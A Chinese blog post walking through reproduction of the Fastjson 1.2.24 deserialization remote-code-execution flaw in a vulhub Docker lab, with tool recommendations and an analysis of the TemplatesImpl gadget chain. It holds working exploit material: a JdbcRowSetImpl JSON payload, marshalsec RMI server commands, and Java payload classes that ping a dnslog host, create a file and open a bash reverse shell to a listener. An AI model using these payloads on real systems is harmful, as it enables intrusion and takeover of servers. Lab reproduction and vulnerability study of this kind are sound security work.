Fastjson反序列化漏洞

于 2024-02-19 22:00:27 发布
阅读量997 收藏 14
点赞数 14
文章标签: 网络安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/g1345444/article/details/136178932
版权

一、环境搭建

1、安装docker

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun
![[Pasted image 20240122202459.png]]

2、安装docker-compose

pip install docker-compose
![[Pasted image 20240122203114.png]]

3、gitvulhub镜像

git clone https://github.com/vulhub/vulhub.git
![[Pasted image 20240122203343.png]]

4、进入指定目录启动环境

cd vulhub/fastjson/1.2.24-rce
docker compose up -d
![[Pasted image 20240126050737.png]]

访问http://ip:8090
![[Pasted image 20240126050919.png]]

二、漏洞复现

1、复现过程

首先在dnslog获得一个dnslog
![[Pasted image 20240126052639.png]]

地址:http://www.dnslog.cn/
然后下载marshalsec
下载地址:https://github.com/RandomRobbieBF/marshalsec-jar
在该文件同文件夹下创建一个TouchFile.java文件
内容如下

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
	static {
		try {
			Runtime rt = Runtime.getRuntime();
			String[] commands = {"ping", "xxx.dnslog.cn(刚开始获取的dnslog)"};
			Process pc = rt.exec(commands);
			pc.waitFor();
		} catch (Exception e) {
 			// do nothing
 		}
 	}
}

使用javac命令将其编译为TouchFile.class文件
![[Pasted image 20240126051539.png]]

![[Pasted image 20240126051552.png]]

使用python3 -m http.server 任意端口(注意不要冲突)
![[Pasted image 20240126051737.png]]

开启marshalsec

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://ip:1111(刚刚开放的端口)/#TouchFile" 9999

打开bp在靶场页面抓包
![[Pasted image 20240126052159.png]]

发送到repeater
将get请求修改为post请求
添加Content-Type: application/json和payload

{
	"b":{
		"@type":"com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName":"rmi://ip:9999/TouchFile",
		"autoCommit":true
	}
}

![[Pasted image 20240126053123.png]]

点击发送
然后去dnslog查看有没有响应
![[Pasted image 20240126054307.png]]

成功
创建文件
将TouchFile.java文件内容修改为以下代码

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
	static {
		try {
			Runtime rt = Runtime.getRuntime();
			String[] commands = {"touch", "/tmp/1111"};
			Process pc = rt.exec(commands);
			pc.waitFor();
		} catch (Exception e) {
 			// do nothing
 		}
 	}
}

然后编译成class文件,同样的操作发包
然后进入容器查看有没有创建成功
docker exec -it 容器id前四位 /bin/bash
![[Pasted image 20240126054955.png]]

成功
再来反弹一下shell
将TouchFile.java文件内容修改为以下代码

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
	static {
		try {
			Runtime r = Runtime.getRuntime();
			Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/ip/6666 0>&1"});
			p.waitFor();
		} catch (Exception e) {
 			// do nothing
 		}
 	}
}

在kali开启监听
![[Pasted image 20240126082857.png]]

同样的操作,发包
![[Pasted image 20240126060333.png]]

成功

2、工具推荐

marshalsec
![[Pasted image 20240126051737.png]]

JNDI-Injection-Exploit
下载地址:https://github.com/welk1n/JNDI-Injection-Exploit
使用方法

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

FastjsonScan
下载地址:https://github.com/a1phaboy/FastjsonScan
![[Pasted image 20240126061708.png]]

BurpSuite插件 – FastjsonScan
下载地址:https://github.com/pmiaowu/BurpFastJsonScan
点击extender
![[Pasted image 20240126062250.png]]

点击add
![[Pasted image 20240126062319.png]]

点击select file
![[Pasted image 20240126062415.png]]

选择文件
![[Pasted image 20240126062559.png]]

然后点击next进行安装
安装成功
![[Pasted image 20240126062622.png]]

![[Pasted image 20240126062709.png]]

三、漏洞分析

利用链流程

![[Pasted image 20240126112136.png]]

进入deserialze后解析到key为_bytecodes时,调用parseField()进一步解析
![[Pasted image 20240126105822.png]]

跟进parseField方法,对_bytecodes对应的内容进行解析
![[Pasted image 20240126105832.png]]

跟进FieldDeserializer#parseField方法
![[Pasted image 20240126105843.png]]

解析出_bytecodes对应的内容后,会调用setValue()函数设置对应的值,这里value即为恶意类二进制内容Base64编码后的数据
继续跟进FieldDeserializer#setValue方法
![[Pasted image 20240126105902.png]]

这里使用了set方法来设置_bytecodes的值
接着解析到_outputProperties的内容
![[Pasted image 20240126105914.png]]

这里去除了_,跟进发现使用反射调用了com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getOutputProperties()
![[Pasted image 20240126105925.png]]

跟进TemplatesImpl#getOutputProperties
![[Pasted image 20240126105936.png]]

跟进newTransformer方法
![[Pasted image 20240126105947.png]]

跟进getTransletInstance方法
![[Pasted image 20240126105957.png]]

这里通过defineTransletClasses创建了TEMPOC类并生成了实例
![[Pasted image 20240126110007.png]]

进而执行TEMPOC类的构造方法
![[Pasted image 20240126110015.png]]

所以就执行了任意代码

四、参考文章

https://blog.csdn.net/Bossfrank/article/details/130100893
https://blog.csdn.net/hackzkaq/article/details/135825310
https://www.cnblogs.com/nice0e3/p/14601670.html#0x03-fastjson-templatesimpl%E9%93%BE-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90
https://xz.aliyun.com/t/8979?time__1311=n4%2BxuDgDBD90D%3DK0%3DG8DlxG2bm7KiIoEvNQeox&alichlgref=https%3A%2F%2Fcn.bing.com%2F#toc-8

fgzymrszyz
关注
  • 14
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
35-3 使用dnslog探测fastjson漏洞
weixin_43263566的博客
04-10 515
DNSLog是一种记录在DNS上的域名相关信息的机制,类似于日志文件,记录了对域名或IP的访问信息。因特网采用树状结构的命名方法,按照组织结构划分域,每个域都是名字空间中被管理的一个划分,可以进一步划分为子域。当向DNS服务器发起kxsy.work的解析请求时,DNSLog会记录下此次解析,包括解析的域名和对应的IP地址。刷新dnslog服务器的记录,有记录就说明存在漏洞(一开始的4ax的子域名发送请求,刷新看不到,我就获取一个新的子域名做演示,所以下面的截图中的域名跟上一张不一样)将数据包发送到重发器。
通过dnslog探测fastjson的几种方法
Adminxe的博客
05-04 7702
0x01 背景 在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。 昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。有趣的是后续的师傅们讨论还挺热闹的,我也在这次讨论中学习了很多。这篇...
fastjson反序列化漏洞
cc777777777的博客
06-12 484
fastjson反序列化漏洞
【星落】Fastjson 漏洞复现
最新发布
星星得不到爱火QAQ的博客
01-20 1028
Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1758
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
Fastjson反序列化
热门推荐
Christ1na的博客
11-15 1万+
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。fastjson是目前java语言中最快的json库,其功能完备且使用简单,因而使用非常广泛。自fastjson在1.2.24版本爆出第一次漏洞到至今,有着多次的安全补丁更新和绕过。
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4477
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
代码审计-fastjsondnslog探测方式分析
cdyunaq的博客
12-15 1885
前言 正常测试的时候,发现java后端对json处理都会去测试一下是否存在反序列化,但是后端处理json的组件很多,比如fastjson、jackson、gson等,怎么判断是否使用了fastjson呢? 有一个简便无危害的方式,就是通过dnslog来判断。 大佬们讨论的issue 说明 前面我们在分析的时候,会发现很多有一个变量token在进行判断,比如token == 12 或者 token == 14等,那这个token到底代表啥呢?在com.alibaba.fastjson.parser.
Tcsec安全研究院|fastjson漏洞分析
tcsecXD的博客
02-14 1935
fastjson 是一个 Java 库,可用于将 Java 对象转换为其 JSON 表示形式。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2203
Fastjson反序列化漏洞复现
Fastjson
N的博客
03-14 2283
Fastjson:我一路向北,离开有你的季节
Fastjson在实战中的检测与利用
why811的博客
10-08 1763
参考:https://github.com/alibaba/fastjson/issues/3077java.net.InetAddress这个gadget在1.2.49禁止了。如果上面这个poc可以出dnslog说明很大概率可以rce。如果以上这些poc可以出dnslog,则可以说明后端百分百是fastjson。最近发现有个容易被人弄错的地方,就是fastjson的payload。网上的Payload,发现有的目标可以成功,有的目标不能成功,这是为什么?
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3722
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
fastjson 反序列化漏洞
08-24
fastjson 反序列化漏洞是指在使用 fastjson 库解析 JSON 字符串时存在安全风险的问题。具体来说,fastjson 反序列化漏洞是由于 fastjson 在处理特定的恶意构造的 JSON 字符串时,可能会触发不安全的反序列化操作,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值